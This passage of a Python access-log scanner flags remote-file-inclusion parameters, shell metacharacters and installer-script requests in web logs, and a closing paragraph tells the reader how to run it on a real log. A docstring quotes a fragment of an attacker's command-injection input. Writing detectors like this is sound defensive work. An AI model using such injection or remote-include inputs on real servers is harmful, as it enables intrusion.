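    Done by hand rather than with parse_qsl because older Pythons also split
    on ';', which would chop the attacker's 'cmd=cd ..;cd ..;...' into pieces.
    """
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, val = part.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(val)))
    return pairs


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["params"] = split_query(url.query)
    return rec


def findings(rec):
    """List of (tag, detail) pairs for one parsed record; empty if it looks benign."""
    out = []
    script = rec["path"].rsplit("/", 1)[-1].lower()
    if script in INSTALLER_SCRIPTS:
        out.append(("installer-script", rec["path"]))
    for key, val in rec["params"]:
        lowered = val.lower().lstrip()
        # Remote file inclusion: an include-path parameter pointing at another host.
        if lowered.startswith(("http://", "https://", "ftp://")) and key.lower().endswith(INCLUDE_KEY_SUFFIXES):
            out.append(("remote-include", f"{key}={val}"))
        # Command injection payload riding along in any parameter (decoded value).
        if SHELL_META.search(val):
            out.append(("shell-metachars", f"{key}={val}"))
    return out


def scan(log_text):
    """Run findings() over every line; keep the status so a 200 (script ran)
    stays distinguishable from a 403 (script present but unreadable)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = findings(rec)
        if tags:
            hits.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": int(rec["status"]),
                "tags": [t for t, _ in tags],
                "detail": [d for _, d in tags],
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {hit["path"]} {", ".join(hit["tags"])}')
        for d in hit["detail"]:
            print("    " + d)
```

The include-path rule keys on the parameter name, so the benign redirect=http://... in the third sample line is not flagged; widen INCLUDE_KEY_SUFFIXES to taste for the application you run. Feed it the real access_log with scan(open(path).read()) and grep the output for status 200 first, since those are the requests where the remote file was actually fetched and run.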